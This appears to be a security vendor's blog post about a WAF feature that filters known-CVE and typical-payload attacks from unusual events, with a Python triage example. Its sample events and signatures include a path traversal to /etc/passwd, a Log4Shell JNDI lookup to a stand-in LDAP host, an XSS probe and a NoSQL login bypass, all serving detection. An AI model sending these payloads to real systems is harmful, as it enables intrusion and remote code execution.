Attacks against known vulnerabilities are one of the most common security risks. Have you seen the updated OWASP Top 10? The risk formerly listed as A9:2017 Using Components with Known Vulnerabilities is now titled A06:2021-Vulnerable and Outdated Components, moving up from #9 in 2017 to #6 in 2021. We highlighted this in the OWASP Top 10 2021 proposal we published earlier this year.
We all know that patch management is hard, for many reasons: backward compatibility, code refactoring overhead, testing, legacy code. Patches and updates are simply hard to apply on time. This is exactly the gap that WAFs and API security platforms can help close with attack detection, virtual patches, and proactive vulnerability detection, buying time until the real fix is deployed.
Known attacks vs. unknown attacks
Wallarm is introducing a new feature that highlights known attacks:
- Attacks against known vulnerabilities and the CVEs associated with them.
- Typical payloads and attack vectors that our team has already seen in the wild.
Using the new filters, you can exclude all known attacks from your analysis, which drastically decreases the number of events to review. Events that are most likely mass scanning and random testing drop out, leaving you free to focus on unique events and unusual attacks. It is also a good way to spot potential false positives: events matching known attack signatures are highly unlikely to be false positives, so whatever false positives exist will be concentrated in the remaining set. Use this attack query to exclude all typical/known attacks and get only the unusual events:
- attacks today !known
For example, one of our customers had ~1K attacks over the last 7 days, but only 12 events that did not rely on typical tooling, CVEs, or scanning. That is a huge difference in the amount of data to analyze.
Another use case: suppose you learn about a new CVE that is relevant to your tech stack. You can instantly run a search query and check whether there have been any exploitation attempts against your applications. Keep in mind that this shows observed attempts, not whether the attempts succeeded or whether your application is actually vulnerable, so it complements rather than replaces checking your component versions.
The new feature is already deployed for the whole customer base. No updates or additional configuration are required.
See it in action
Here are some usage examples.
Choose between searching all events, known attacks, or unknown attacks:
- All attacks – see all results
- Known attacks (CVE) – attacks that are known to target CVEs or use typical payloads
- Other attacks – everything not recognized as a known attack; this is where 0-days and potential false positives end up
Search attacks by CVE
You can search for attacks that target a particular CVE:
- attacks today known CVE-2021-41773
Or, to find all events related to any known CVE, use the known cve keywords:
- attacks today known cve
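To make the triage described above concrete (excluding known attacks to review only the unusual ones, and searching by CVE), here is an added Python example. It is not Wallarm's code and does not use Wallarm's query language; the signature database behind the real feature is not published in this post. The signature table is deliberately tiny and its regular expressions are simplified assumptions (the two CVEs are real: CVE-2021-41773 is the Apache httpd 2.4.49 path traversal via a URL-encoded dot segment, CVE-2021-44228 is Log4Shell), and the sample request events are constructed for the example. The `query()` function expresses the post's three filters (`attacks today`, `attacks today !known`, `attacks today known CVE-2021-41773`, `attacks today known cve`) as keyword arguments.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Signature:
    name: str            # CVE ID, or a label for a typical payload with no CVE
    pattern: re.Pattern  # simplified match; a real signature is more precise
    is_cve: bool


# Constructed, deliberately small signature table (assumption for this example;
# a product database holds thousands of entries and is updated daily).
SIGNATURES = (
    # Apache httpd 2.4.49 path traversal: a dot segment whose second dot is
    # URL-encoded ("/.%2e/") slipped past path normalization.
    Signature("CVE-2021-41773", re.compile(r"/\.%2e/|/%2e%2e/", re.I), True),
    # Log4Shell: a JNDI lookup string in any request field.
    Signature("CVE-2021-44228", re.compile(r"\$\{jndi:", re.I), True),
    # Typical scanner probe for reflected XSS; a known payload, not tied to a CVE.
    Signature("typical-xss-probe", re.compile(r"<script>alert\(", re.I), False),
)
CVE_NAMES = {s.name for s in SIGNATURES if s.is_cve}


@dataclass
class Event:
    ts: str
    method: str
    path: str
    headers: dict
    body: str = ""
    matched: list = field(default_factory=list)  # signature names, set by classify()

    def known(self) -> bool:
        return bool(self.matched)


def classify(event: Event) -> Event:
    """Tag an event with every signature that matches any part of the request."""
    haystack = "\n".join([event.path, *event.headers.values(), event.body])
    event.matched = [s.name for s in SIGNATURES if s.pattern.search(haystack)]
    return event


def query(events, known=None, cve=None):
    """Filters in the spirit of the post's queries (syntax here is this example's own):
    known=None  -> all events
    known=False -> '!known': other attacks only
    known=True  -> known attacks only
    cve='any'   -> 'known cve': matched at least one CVE signature
    cve='CVE-X' -> 'known CVE-X': matched that specific CVE
    """
    out = []
    for e in events:
        if known is not None and e.known() != known:
            continue
        if cve == "any" and not (CVE_NAMES & set(e.matched)):
            continue
        if cve not in (None, "any") and cve not in e.matched:
            continue
        out.append(e)
    return out


# Constructed sample traffic: three events a scanner would produce and two that
# are specific to this (fictional) application and deserve a human look.
EVENTS = [classify(e) for e in (
    Event("2021-10-06T09:12:01Z", "GET", "/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd",
          {"User-Agent": "curl/7.68.0"}),
    Event("2021-12-10T18:40:22Z", "GET", "/",
          {"User-Agent": "${jndi:ldap://198.51.100.7:1389/a}"}),
    Event("2021-12-10T18:41:03Z", "GET", "/search?q=<script>alert(1)</script>",
          {"User-Agent": "Mozilla/5.0"}),
    Event("2021-12-11T02:15:44Z", "POST", "/api/v1/login",
          {"Content-Type": "application/json"},
          body='{"user": {"$gt": ""}, "pass": {"$gt": ""}}'),
    Event("2021-12-11T02:16:10Z", "PUT", "/api/v1/users/42",
          {"Content-Type": "application/json"},
          body='{"role": "admin"}'),
)]


def triage_summary(events):
    """The counts an analyst looks at first: total, known, known-CVE, and what is left to review."""
    return {
        "all": len(events),
        "known": len(query(events, known=True)),
        "known_cve": len(query(events, cve="any")),
        "other": len(query(events, known=False)),
    }


if __name__ == "__main__":
    print(triage_summary(EVENTS))  # {'all': 5, 'known': 3, 'known_cve': 2, 'other': 2}
    for e in query(EVENTS, known=False):
        print("review:", e.ts, e.method, e.path)
    for e in query(EVENTS, cve="CVE-2021-41773"):
        print("CVE-2021-41773 attempt:", e.ts, e.path)
```

The two events left in the "other" bucket are the ones no scanner template produced (a NoSQL operator in a login body and a role change on a user object), which is the point of the filter: the known set is safe to batch-review, the other set is where analyst time goes. Note that signature matching on raw request text is intentionally simple here; a production engine also decodes and normalizes each parameter before matching, which matters for CVE-2021-41773 in particular, since encoding variants of the dot segment are the whole trick.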
The Wallarm team has added more than 1,500 recent CVEs to the list and updates the database daily. One objective is to analyze every new CVE and introduce a filter for it as soon as public data on the CVE is published. The team also works backward, analyzing real attack data to add filters for more known attacks and payloads seen in the wild.